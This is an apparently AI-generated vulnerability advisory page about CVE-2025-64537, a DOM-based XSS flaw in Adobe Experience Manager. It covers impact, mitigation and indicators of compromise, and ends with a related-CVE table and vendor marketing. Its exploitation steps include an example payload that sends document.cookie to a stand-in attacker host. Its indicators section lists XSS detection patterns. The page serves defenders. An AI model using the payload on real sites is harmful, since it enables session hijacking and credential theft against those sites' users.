CVE-2025-64537
Adobe Experience Manager vulnerability analysis and mitigation

Overview

CVE-2025-64537 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that could lead to arbitrary code execution in the context of a victim's browser. It affects AEM versions 6.5.23 and earlier (on-premises), AEM 6.5 LTS, and AEM Cloud Service versions prior to 2025.12.0. Adobe disclosed and patched this vulnerability on December 9, 2025. It carries a CVSS v3.1 base score of 9.3 (Critical) (Adobe Advisory, Feedly).

Technical details

The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically as a DOM-based XSS variant (CAPEC-588). The root cause is insufficient sanitization of user-controlled input that is written directly into the DOM, allowing injected scripts to execute in the victim's browser without server-side reflection. Exploitation requires no privileges and no special configuration, but does require user interaction — a victim must visit or be directed to a crafted malicious page. No technical write-up or public PoC code has been identified at this time (Adobe Advisory, Feedly).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, enabling session hijacking via cookie theft, credential capture, and unauthorized actions performed on behalf of the authenticated user. The CVSS scope is marked as "Changed," reflecting that the impact extends beyond the vulnerable component to the victim's browser environment. Confidentiality and integrity impacts are both rated High, as an attacker can achieve full session takeover and potentially compromise the entire AEM web application's security posture; availability is not directly impacted (Adobe Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify publicly accessible Adobe Experience Manager instances running version 6.5.23 or earlier, or AEM Cloud Service prior to 2025.12.0, using web search, Shodan, or Censys.
  2. Identify vulnerable DOM sink: Analyze AEM pages for DOM-based XSS sinks — JavaScript code that reads attacker-controlled input (e.g., URL fragments, query parameters) and writes it unsanitized to the DOM via innerHTML, document.write(), or similar methods.
  3. Craft malicious URL: Construct a URL targeting the vulnerable AEM page with a malicious payload embedded in the fragment or query parameter, e.g., https://target-aem.example.com/vulnerable-page.html#<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.
  4. Deliver to victim: Send the crafted URL to a target user via phishing email, social engineering, or by embedding it in a third-party site, inducing the victim to click the link.
  5. Script execution and session takeover: When the victim loads the page, the malicious script executes in their browser, exfiltrating session cookies or credentials to the attacker's server, enabling session hijacking or further unauthorized actions within AEM (Adobe Advisory, Feedly).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after visiting AEM pages; unusual GET/POST requests containing encoded script payloads in URL fragments or query parameters targeting AEM endpoints.
  • Logs: AEM access logs showing requests to specific pages with suspicious URL-encoded characters (%3C, %3E, %22, onerror, javascript:) in query strings or referrer headers; web application firewall (WAF) alerts for XSS pattern matches against AEM URLs.
  • Browser/Client-Side: Unexpected JavaScript execution or network requests originating from AEM page context in browser developer tools; session cookies accessed or transmitted to third-party domains.
  • Application: Anomalous AEM user session activity (e.g., actions performed from unusual IP addresses or at unusual times) following a user visiting a suspicious link (Feedly).

Mitigation and workarounds

Adobe has released patches addressing this vulnerability: AEM on-premises users should upgrade to version 6.5.24.0 or later; AEM Cloud Service users should update to the 2025.12.0 release or later. As interim mitigations, organizations should implement a strict Content Security Policy (CSP) to limit script execution, apply HTTP-only and Secure flags to session cookies, and validate/sanitize all user-supplied input at the application layer. Monitoring for suspicious script injection patterns via WAF rules is also recommended (Adobe Advisory).

Community reactions

The vulnerability was noted in CIS's December 2025 advisory covering multiple Adobe product vulnerabilities, and SOCRadar included it in their December 2025 Patch Tuesday coverage. Tenable published a detection plugin (Nessus plugin 278346) for this CVE. Community reaction has been routine, with no notable researcher commentary or significant social media discussion beyond standard vulnerability tracking (CIS Advisory, SOCRadar, Tenable).

Additional resources


SourceThis report was generated using AI

Related Adobe Experience Manager vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-48359CRITICAL9.6
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesJul 14, 2026
CVE-2026-48310HIGH8.6
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesJul 14, 2026
CVE-2026-48355MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesJul 14, 2026
CVE-2026-48263MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesJul 14, 2026
CVE-2026-48262MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesJul 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management